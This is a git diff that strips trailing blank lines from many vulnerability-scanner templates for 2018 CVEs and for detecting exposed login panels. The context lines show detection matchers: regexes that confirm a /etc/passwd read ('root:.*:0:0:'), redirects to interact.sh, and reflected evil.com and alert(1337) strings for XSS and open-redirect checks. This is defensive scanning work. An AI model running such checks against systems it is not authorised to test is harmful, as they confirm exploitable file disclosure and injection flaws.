a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -28,5 +28,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index e0878f1466..8fc912dc37 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -38,5 +38,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index ed1f65bfa2..23e85b7035 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index 2f7f4df9d4..9c48d3e539 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -31,5 +31,3 @@ http: part: body words: - '' - - diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index 6c30a46f79..44cae814ed 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 7f0d4c9713..392ee807ae 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -40,5 +40,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index 56abb9c8a0..7d036679aa 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -50,5 +50,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index 0f9fffeac8..2cbc98f0bc 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -32,4 +32,3 @@ http: part: body regex: - '^var fgt_lang =' - diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index be03792ec3..edf167228a 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -44,5 +44,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 492e06c487..4c272ccdcc 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 872cec7b3b..208e93a322 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -39,5 +39,3 @@ http: part: header words: - text/html - - diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 00a859e431..e1c92c1376 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index c878882242..7fc197fb5e 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -32,5 +32,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index d779c97be4..4dfe408834 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -37,5 +37,3 @@ http: - "Location: https://www.interact.sh" - "Location: http://www.interact.sh" part: header - - diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 32c180f762..40d69109b0 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -30,5 +30,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index bca9500751..dfc1d0de73 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index aa2beecd23..1255073c74 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index abfaadf74c..786baa0e19 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 913e454492..3a71012a18 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -28,5 +28,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index c21fbef24b..00e9db5066 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index f728e9d1bc..c4b8e8b59c 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -29,5 +29,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index a70a01c533..54bb89a0ef 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-15745.yaml b/http/cves/2018/CVE-2018-15745.yaml index ee054f6268..108f8706a2 100644 --- a/http/cves/2018/CVE-2018-15745.yaml +++ b/http/cves/2018/CVE-2018-15745.yaml @@ -38,4 +38,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2018/CVE-2018-15961.yaml b/http/cves/2018/CVE-2018-15961.yaml index 977892e397..8847ddaf86 100644 --- a/http/cves/2018/CVE-2018-15961.yaml +++ b/http/cves/2018/CVE-2018-15961.yaml @@ -68,5 +68,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16059.yaml b/http/cves/2018/CVE-2018-16059.yaml index aeaeaed7a5..f868909086 100644 --- a/http/cves/2018/CVE-2018-16059.yaml +++ b/http/cves/2018/CVE-2018-16059.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16133.yaml b/http/cves/2018/CVE-2018-16133.yaml index 17f745087f..6723a086ac 100644 --- a/http/cves/2018/CVE-2018-16133.yaml +++ b/http/cves/2018/CVE-2018-16133.yaml @@ -34,5 +34,3 @@ http: - "fonts" - "extensions" condition: and - - diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index ce84867b2b..d2b8af37c2 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -40,5 +40,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 4bce0d966a..8beb4420f9 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -40,5 +40,3 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and - - diff --git a/http/cves/2018/CVE-2018-16167.yaml b/http/cves/2018/CVE-2018-16167.yaml index 24cdf836dd..9bf4abb64c 100644 --- a/http/cves/2018/CVE-2018-16167.yaml +++ b/http/cves/2018/CVE-2018-16167.yaml @@ -34,5 +34,3 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - diff --git a/http/cves/2018/CVE-2018-16283.yaml b/http/cves/2018/CVE-2018-16283.yaml index c6cdf78476..a941e3071e 100644 --- a/http/cves/2018/CVE-2018-16283.yaml +++ b/http/cves/2018/CVE-2018-16283.yaml @@ -29,5 +29,3 @@ http: regex: - "root:.*:0:0:" part: body - - diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 9b6edbc424..be533e9995 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index b744cebd26..e9aad13aea 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index 3f2b80d205..f621ad2d63 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -24,5 +24,3 @@ http: part: body words: - "31333333337" - - diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index d4b6d37fe2..1387eb8922 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -38,5 +38,3 @@ http: - "** Platform sources **" - "** Application sources **" condition: and - - diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index 0ad071a2e4..e9c394de7b 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -36,5 +36,3 @@ http: - "" - "Reader.STATUS" condition: and - - diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index d01ac0ad8f..710adc6fe7 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -37,5 +37,3 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" - - diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 35b00a5e3b..b1f598c0ff 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 0df985fa1c..b7f1b5b726 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -31,5 +31,3 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - - diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 932d260474..8e24b573a8 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -35,5 +35,3 @@ http: - type: regex regex: - "root:.*:0:0:" - - diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 9ad6f63e9b..b7a53f58e4 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index bd222e925a..425266104f 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -36,5 +36,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 2781d236d7..1c6e950de4 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -43,5 +43,3 @@ http: part: header words: - "application/json" - - diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index e73a1f5858..25beccfb9e 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -32,5 +32,3 @@ http: part: body words: - "nuclei-template" - - diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 437f8c67b0..d0e250be5d 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -33,5 +33,3 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" - - diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index e4c1af11a9..54d8394314 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -42,5 +42,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index d55a59d484..159dd06c56 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -35,5 +35,3 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and - - diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 987cb4a40a..40cc4c03d8 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -38,4 +38,3 @@ http: - type: status status: - 200 - diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index 23dc9b3766..2a494d6667 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 620b037337..74bb9411c9 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -37,5 +37,3 @@ http: words: - "text/html" part: header - - diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index a9cac6f249..ce6da1839e 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -43,5 +43,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index 4dd72661c7..39dce74401 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -37,5 +37,3 @@ http: words: - "text/html" part: header - - diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index a99db44db8..b2d3a71d76 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -34,5 +34,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index db484b0e86..af34e6fabd 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -34,5 +34,3 @@ http: - type: regex regex: - "root:.*:0:0:" - - diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index ca7af59df5..f2b0c25463 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -37,5 +37,3 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' - - diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 56e4714a27..c58f78f2d2 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -49,5 +49,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 2365caf620..e496c6dd19 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -48,5 +48,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 2c62ba239d..8a080ead9a 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -51,5 +51,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index c7a47929b3..7189ba5d63 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -39,5 +39,3 @@ http: part: header words: - "application/octet-stream" - - diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 263aeb2ddd..f3fcd204d7 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 82dc378655..9e3f2a1f96 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -31,5 +31,3 @@ http: - type: word words: - 'alert(1337)" part: body - - diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 1d5eda9f1d..57c925481d 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/concourse-ci-panel.yaml b/http/exposed-panels/concourse-ci-panel.yaml index 320a28280b..1e4846b743 100644 --- a/http/exposed-panels/concourse-ci-panel.yaml +++ b/http/exposed-panels/concourse-ci-panel.yaml @@ -28,5 +28,3 @@ http: - 'Concourse' - 'login to Concourse' condition: or - - diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index e96ef5b1ec..b28357e283 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -37,5 +37,3 @@ http: group: 1 regex: - 'Version ([0-9.]+)' - - diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 590a59b890..566a27cdf1 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -36,5 +36,3 @@ http: regex: - 'content="concrete5 \- ([0-9.]+)"\/>' - 'Version ([0-9.]+)' - - diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index d1840f3022..b89c22c409 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 302 - - diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index 50900a55f6..43179a2e42 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -32,5 +32,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index f032587d0c..e90f8a7ada 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -33,5 +33,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 074b0d9477..771a745cb3 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/contentkeeper-detect.yaml b/http/exposed-panels/contentkeeper-detect.yaml index 61092684ce..7abd5da49a 100644 --- a/http/exposed-panels/contentkeeper-detect.yaml +++ b/http/exposed-panels/contentkeeper-detect.yaml @@ -36,5 +36,3 @@ http: words: - "text/html" part: header - - diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 712f02f22b..1b7b3fa97b 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index 6f619d7fee..4836ae7f51 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -28,5 +28,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index b4febb91ca..f176e993d4 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index 6722db78be..152261e601 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -22,5 +22,3 @@ http: - type: word words: - 'Project Fauxton' - - diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index 0238f45875..9560f1ef4e 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -35,5 +35,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index 68465f6f96..e0ec247f55 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -30,5 +30,3 @@ http: part: body words: - 'CRXDE Lite" - - diff --git a/http/exposed-panels/csod-panel.yaml b/http/exposed-panels/csod-panel.yaml index eef24687a3..f7f66f36f8 100644 --- a/http/exposed-panels/csod-panel.yaml +++ b/http/exposed-panels/csod-panel.yaml @@ -26,5 +26,3 @@ http: - "csodcommon" part: body condition: or - - diff --git a/http/exposed-panels/cudatel-panel.yaml b/http/exposed-panels/cudatel-panel.yaml index 5ca146a514..e4076aed09 100644 --- a/http/exposed-panels/cudatel-panel.yaml +++ b/http/exposed-panels/cudatel-panel.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/cvent-panel-detect.yaml b/http/exposed-panels/cvent-panel-detect.yaml index 427205853f..9c46690ab1 100644 --- a/http/exposed-panels/cvent-panel-detect.yaml +++ b/http/exposed-panels/cvent-panel-detect.yaml @@ -34,5 +34,3 @@ http: - "Cvent Inc" - "Cvent, Inc." condition: or - - diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index 03813f0378..a5c75ce618 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -36,5 +36,3 @@ http: part: header words: - "cwpsrv" - - diff --git a/http/exposed-panels/cx-cloud-login.yaml b/http/exposed-panels/cx-cloud-login.yaml index 76df734335..6ed5dc14ad 100644 --- a/http/exposed-panels/cx-cloud-login.yaml +++ b/http/exposed-panels/cx-cloud-login.yaml @@ -23,5 +23,3 @@ http: - type: word words: - "CX Cloud" - - diff --git a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml index c330e77556..c6d4491166 100644 --- a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml +++ b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml @@ -37,5 +37,3 @@ http: group: 1 regex: - 'src="\/javascript\/validation\/sslvpnlogin\.js\?version=(.+)" ><\/script>' - - diff --git a/http/exposed-panels/d-link-wireless.yaml b/http/exposed-panels/d-link-wireless.yaml index 39d0821455..d4e9656330 100644 --- a/http/exposed-panels/d-link-wireless.yaml +++ b/http/exposed-panels/d-link-wireless.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index 63ecb8308a..3cafa1c471 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index d4b1d5387b..0b9601a88d 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 83b5646bde..a87b36f5ab 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -30,5 +30,3 @@ http: part: header words: - "text/html" - - diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index 091845454f..db0b6662fb 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index 21aa2651fa..ba315af937 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -30,5 +30,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/defectdojo-panel.yaml b/http/exposed-panels/defectdojo-panel.yaml index eb3b65ffed..a3e3190bc5 100644 --- a/http/exposed-panels/defectdojo-panel.yaml +++ b/http/exposed-panels/defectdojo-panel.yaml @@ -23,5 +23,3 @@ http: - type: word words: - "\"DefectDojoLog In' - 'device/logOff_up_menu1.htm' condition: and - - diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index d5a13cf783..09a3d47369 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/delta-login-panel.yaml b/http/exposed-panels/delta-login-panel.yaml index b51ecc964a..5e02485d76 100644 --- a/http/exposed-panels/delta-login-panel.yaml +++ b/http/exposed-panels/delta-login-panel.yaml @@ -29,5 +29,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index c6e1346ed4..bd2d13801c 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -37,5 +37,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/dericam-login.yaml b/http/exposed-panels/dericam-login.yaml index 731d1c10f7..13e6115bae 100644 --- a/http/exposed-panels/dericam-login.yaml +++ b/http/exposed-panels/dericam-login.yaml @@ -31,5 +31,3 @@ http: - type: status status: - 200 - - diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index 7dd650e81a..e174ef9c31 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -35,5 +35,3 @@ http: part: body words: - 'Digital Rebar' - - diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml 